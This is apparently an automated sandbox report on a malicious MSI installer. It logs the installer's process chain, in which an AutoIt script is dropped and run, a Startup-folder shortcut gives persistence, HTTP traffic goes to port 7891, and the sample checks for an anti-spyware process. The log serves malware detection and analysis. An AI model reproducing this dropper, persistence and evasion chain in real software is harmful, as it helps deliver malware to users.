            Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_00428238 recv,9_2_00428238
            Source: OLicenseHeartbeat.exe, 0000000C.00000002.812170962.000000000136A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
            Source: Yara matchFile source: Process Memory Space: Autoit3.exe PID: 4108, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 4696, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Autoit3.exe PID: 7204, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 7404, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: SciTE.exe PID: 7396, type: MEMORYSTR
            Source: C:\Windows\System32\msiexec.exeFile deleted: C:\Windows\Installer\MSIDAD.tmpJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\5f09c5.msiJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_004222B49_2_004222B4
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0045652C9_2_0045652C
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_004567789_2_00456778
            Source: C:\Windows\SysWOW64\cmd.exeCode function: String function: 00404500 appears 50 times
            Source: C:\Windows\SysWOW64\cmd.exeCode function: String function: 00404554 appears 55 times
            Source: C:\Windows\SysWOW64\cmd.exeCode function: String function: 004049DC appears 65 times
            Source: C:\Windows\SysWOW64\cmd.exeCode function: String function: 00406B98 appears 77 times
            Source: C:\Windows\SysWOW64\cmd.exeCode function: String function: 00446258 appears 33 times
            Source: C:\Windows\SysWOW64\cmd.exeCode function: String function: 00455C58 appears 539 times
            Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\SysWOW64\icacls.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: unknownProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\15e7232gfN.msi"
            Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
            Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding D8DD1A2B41DAA758FA08D3E85077DC6F
            Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\." /SETINTEGRITYLEVEL (CI)(OI)HIGH
            Source: C:\Windows\SysWOW64\icacls.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\expand.exe "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files
            Source: C:\Windows\SysWOW64\expand.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exe "C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exe" UGtZgHHT.au3
            Source: C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe
            Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\." /SETINTEGRITYLEVEL (CI)(OI)LOW
            Source: C:\Windows\SysWOW64\icacls.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe C:\Program Files (x86)\common files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe
            Source: unknownProcess created: C:\ProgramData\fkeabad\Autoit3.exe "C:\ProgramData\fkeabad\Autoit3.exe" C:\ProgramData\fkeabad\efghhgd.au3
            Source: C:\ProgramData\fkeabad\Autoit3.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe
            Source: unknownProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe
            Source: unknownProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe
            Source: unknownProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe
            Source: unknownProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe
            Source: unknownProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe
            Source: unknownProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe
            Source: unknownProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe
            Source: unknownProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe C:\Program Files (x86)\autoit3\SciTE\SciTE.exe
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe C:\Program Files (x86)\autoit3\Examples\Helpfile\Extras\MyProg.exe
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeProcess created: C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\msinfo32.exe C:\Program Files (x86)\common files\microsoft shared\MSInfo\msinfo32.exe
            Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding D8DD1A2B41DAA758FA08D3E85077DC6FJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\." /SETINTEGRITYLEVEL (CI)(OI)HIGHJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\expand.exe "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* filesJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exe "C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exe" UGtZgHHT.au3 Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\." /SETINTEGRITYLEVEL (CI)(OI)LOWJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exeJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe C:\Program Files (x86)\common files\microsoft shared\OFFICE16\OLicenseHeartbeat.exeJump to behavior
            Source: C:\ProgramData\fkeabad\Autoit3.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exeJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exeJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exeJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exeJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exeJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exeJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exeJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exeJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exeJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exeJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe C:\Program Files (x86)\autoit3\SciTE\SciTE.exeJump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeProcess created: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe C:\Program Files (x86)\autoit3\Examples\Helpfile\Extras\MyProg.exeJump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeProcess created: C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\msinfo32.exe C:\Program Files (x86)\common files\microsoft shared\MSInfo\msinfo32.exeJump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00021401-0000-0000-C000-000000000046}\InProcServer32Jump to behavior
            Source: aafaecg.lnk.9.drLNK file: ..\..\..\..\..\..\..\..\..\ProgramData\fkeabad\Autoit3.exe
            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\aafaecg.lnkJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\TEMP\~DFB7831024D2CFB248.TMPJump to behavior
            Source: classification engineClassification label: mal64.troj.evad.winMSI@51/27@0/1
            Source: C:\Windows\SysWOW64\msiexec.exeFile read: C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\msiwrapper.iniJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_00450548 GetDiskFreeSpaceExA,9_2_00450548
            Source: C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\ProgramData\fkeabad\Autoit3.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_00432F64 CreateToolhelp32Snapshot,9_2_00432F64
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6052:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1236:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4952:120:WilError_01
            Source: C:\Windows\SysWOW64\msiexec.exeFile written: C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\msiwrapper.iniJump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: 15e7232gfN.msiStatic file information: File size 1921024 > 1048576
            Source: Binary string: wntdll.pdbUGP source: Autoit3.exe, 00000008.00000003.560148976.00000000040A4000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000003.559476358.00000000041B6000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000002.567350269.000000000422C000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.565109229.0000000004F80000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000002.614739543.0000000005110000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000003.591225500.0000000004B40000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000002.599283405.0000000004CD0000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000003.595824245.0000000004ED0000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.708417301.0000000005060000.00000004.00001000.00020000.00000000.sdmp, SciTE.exe, 00000018.00000002.819052364.0000000008560000.00000004.00001000.00020000.00000000.sdmp, SciTE.exe, 00000018.00000003.685301980.00000000083D0000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Autoit3.exe, 00000008.00000003.560148976.00000000040A4000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000003.559476358.00000000041B6000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000002.567350269.000000000422C000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.565109229.0000000004F80000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000002.614739543.0000000005110000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000003.591225500.0000000004B40000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000002.599283405.0000000004CD0000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000003.595824245.0000000004ED0000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.708417301.0000000005060000.00000004.00001000.00020000.00000000.sdmp, SciTE.exe, 00000018.00000002.819052364.0000000008560000.00000004.00001000.00020000.00000000.sdmp, SciTE.exe, 00000018.00000003.685301980.00000000083D0000.00000004.00001000.00020000.00000000.sdmp
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0042806C push 00428098h; ret 9_2_00428090
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_004460F8 push 0044613Ah; ret 9_2_00446132
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0043E098 push 0043E0C4h; ret 9_2_0043E0BC
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0044C0B4 push 0044C10Bh; ret 9_2_0044C103
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0042C164 push 0042C272h; ret 9_2_0042C26A
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_004201D0 push 004201FCh; ret 9_2_004201F4
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0041E1F8 push 0041E21Eh; ret 9_2_0041E216
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0042A27C push 0042A2EBh; ret 9_2_0042A2E3
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0042A208 push 0042A279h; ret 9_2_0042A271
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0041E2C4 push 0041E2EAh; ret 9_2_0041E2E2
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0043A2B0 push 0043A2DCh; ret 9_2_0043A2D4
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_00444340 push 0044438Ch; ret 9_2_00444384
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0043A350 push 0043A37Ch; ret 9_2_0043A374
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0043A318 push 0043A344h; ret 9_2_0043A33C
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0043A3C0 push 0043A3ECh; ret 9_2_0043A3E4
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_004443E4 push 00444410h; ret 9_2_00444408
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0043A3F8 push 0043A424h; ret 9_2_0043A41C
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0043A388 push 0043A3B4h; ret 9_2_0043A3AC
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_00444398 push 004443DAh; ret 9_2_004443D2
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0045A410 push 0045A4B6h; ret 9_2_0045A4AE
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0043A4AC push 0043A4D8h; ret 9_2_0043A4D0
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_004504BC push 00450509h; ret 9_2_00450501
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_00458510 push 0045855Ch; ret 9_2_00458554
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0045E5CC push 0045E5F8h; ret 9_2_0045E5F0
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0045E594 push 0045E5C0h; ret 9_2_0045E5B8
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0041C640 push ecx; mov dword ptr [esp], edx9_2_0041C642
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_00440680 push 004406ACh; ret 9_2_004406A4
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_00406764 push 004067B5h; ret 9_2_004067AD
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_00418708 push ecx; mov dword ptr [esp], ecx9_2_0041870D
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_004588A4 push 004588D0h; ret 9_2_004588C8
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0043A8A4 push 0043A8D0h; ret 9_2_0043A8C8
            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\ProgramData\fkeabad\Autoit3.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exeFile created: C:\temp\AutoIt3.exeJump to dropped file
            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\ProgramData\fkeabad\Autoit3.exeJump to dropped file
            Source: C:\Windows\SysWOW64\expand.exeFile created: C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\224f4e28a4d4462680bba17a3145169d$dpx$.tmp\4d7bae1ad8a0f940a33036ae38ff0554.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIDAD.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI3433.tmpJump to dropped file
            Source: C:\Windows\SysWOW64\expand.exeFile created: C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exe (copy)Jump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIDAD.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI3433.tmpJump to dropped file
            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\aafaecg.lnkJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\aafaecg.lnkJump to behavior

            Hooking and other Techniques for Hiding and Protection

            barindex
            Uses known network protocols on non-standard ports
            Source: unknownNetwork traffic detected: HTTP traffic on port 49690 -> 7891
            Source: unknownNetwork traffic detected: HTTP traffic on port 7891 -> 49690
            Source: unknownNetwork traffic detected: HTTP traffic on port 49692 -> 7891
            Source: unknownNetwork traffic detected: HTTP traffic on port 7891 -> 49692
            Source: unknownNetwork traffic detected: HTTP traffic on port 49696 -> 7891
            Source: unknownNetwork traffic detected: HTTP traffic on port 7891 -> 49696
            Source: unknownNetwork traffic detected: HTTP traffic on port 49697 -> 7891
            Source: unknownNetwork traffic detected: HTTP traffic on port 7891 -> 49697
            Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 7891
            Source: unknownNetwork traffic detected: HTTP traffic on port 7891 -> 49702
            Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 7891
            Source: unknownNetwork traffic detected: HTTP traffic on port 7891 -> 49703
            Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 7891
            Source: unknownNetwork traffic detected: HTTP traffic on port 7891 -> 49707
            Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 7891
            Source: unknownNetwork traffic detected: HTTP traffic on port 7891 -> 49708
            Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 7891
            Source: unknownNetwork traffic detected: HTTP traffic on port 7891 -> 49715
            Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 7891
            Source: unknownNetwork traffic detected: HTTP traffic on port 7891 -> 49717
            Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 7891
            Source: unknownNetwork traffic detected: HTTP traffic on port 7891 -> 49721
            Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 7891
            Source: unknownNetwork traffic detected: HTTP traffic on port 7891 -> 49722
            Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 7891
            Source: unknownNetwork traffic detected: HTTP traffic on port 7891 -> 49726
            Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 7891
            Source: unknownNetwork traffic detected: HTTP traffic on port 7891 -> 49727
            Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 7891
            Source: unknownNetwork traffic detected: HTTP traffic on port 7891 -> 49731
            Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 7891
            Source: unknownNetwork traffic detected: HTTP traffic on port 7891 -> 49732
            Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 7891
            Source: unknownNetwork traffic detected: HTTP traffic on port 7891 -> 49736
            Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 7891
            Source: unknownNetwork traffic detected: HTTP traffic on port 7891 -> 49741
            Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 7891
            Source: unknownNetwork traffic detected: HTTP traffic on port 7891 -> 49745
            Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 7891
            Source: unknownNetwork traffic detected: HTTP traffic on port 7891 -> 49748
            Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 7891
            Source: unknownNetwork traffic detected: HTTP traffic on port 7891 -> 49749
            Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 7891
            Source: unknownNetwork traffic detected: HTTP traffic on port 7891 -> 49752
            Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 7891
            Source: unknownNetwork traffic detected: HTTP traffic on port 7891 -> 49756
            Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 7891
            Source: unknownNetwork traffic detected: HTTP traffic on port 7891 -> 49759
            Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 7891
            Source: unknownNetwork traffic detected: HTTP traffic on port 7891 -> 49763
            Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 7891
            Source: unknownNetwork traffic detected: HTTP traffic on port 7891 -> 49767
            Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 7891
            Source: unknownNetwork traffic detected: HTTP traffic on port 7891 -> 49770
            Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\." /SETINTEGRITYLEVEL (CI)(OI)HIGH
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\fkeabad\Autoit3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\msinfo32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\msinfo32.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            barindex
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
            Source: cmd.exe, 00000009.00000002.616883860.0000000005FBC000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000002.614739543.000000000522B000.00000004.00001000.00020000.00000000.sdmp, SciTE.exe, 00000018.00000002.820052302.0000000008EE4000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SUPERANTISPYWARE.EXE
            Source: C:\Windows\SysWOW64\cmd.exe TID: 1264Thread sleep time: -42141s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exe TID: 1264Thread sleep time: -119333s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exe TID: 1264Thread sleep time: -38013s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exe TID: 1264Thread sleep time: -47979s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exe TID: 1264Thread sleep time: -58022s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exe TID: 1264Thread sleep time: -33161s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exe TID: 1264Thread sleep time: -44923s >= -30000sJump to behavior
